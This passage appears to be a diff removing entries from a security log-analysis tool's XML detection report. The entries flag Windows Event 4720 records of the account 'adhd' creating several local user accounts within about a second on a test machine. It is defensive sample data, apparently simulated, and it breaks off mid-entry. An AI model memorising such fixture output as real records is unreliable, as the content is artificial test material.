-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.5471787Z'/&gt;&lt;EventRecordID&gt;5203&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Julia&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1193&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Julia&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Julia</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5197</recordid>
-            <time>2020-06-11 22:05:09.466490300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.4664903Z'/&gt;&lt;EventRecordID&gt;5197&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Peter&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1192&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Peter&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Peter</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5191</recordid>
-            <time>2020-06-11 22:05:09.363536900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.3635369Z'/&gt;&lt;EventRecordID&gt;5191&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Pamela&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1191&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Pamela&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Pamela</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5185</recordid>
-            <time>2020-06-11 22:05:09.282529400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.2825294Z'/&gt;&lt;EventRecordID&gt;5185&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Scott&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1190&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Scott&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Scott</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5179</recordid>
-            <time>2020-06-11 22:05:09.166891200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.1668912Z'/&gt;&lt;EventRecordID&gt;5179&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Theresa&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1189&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Theresa&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Theresa</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5173</recordid>
-            <time>2020-06-11 22:05:09.92370300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.0923703Z'/&gt;&lt;EventRecordID&gt;5173&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jeffrey&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1188&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jeffrey&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jeffrey</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5167</recordid>
-            <time>2020-06-11 22:05:09.8307700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.0083077Z'/&gt;&lt;EventRecordID&gt;5167&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Ethan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1187&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Ethan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Ethan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5161</recordid>
-            <time>2020-06-11 22:05:08.928664500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.9286645Z'/&gt;&lt;EventRecordID&gt;5161&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Katherine&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1186&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Katherine&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Katherine</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5155</recordid>
-            <time>2020-06-11 22:05:08.848213800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.8482138Z'/&gt;&lt;EventRecordID&gt;5155&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Catherine&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1185&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Catherine&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Catherine</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5149</recordid>
-            <time>2020-06-11 22:05:08.763714900Z</time>
-            <channel>Security</channel>
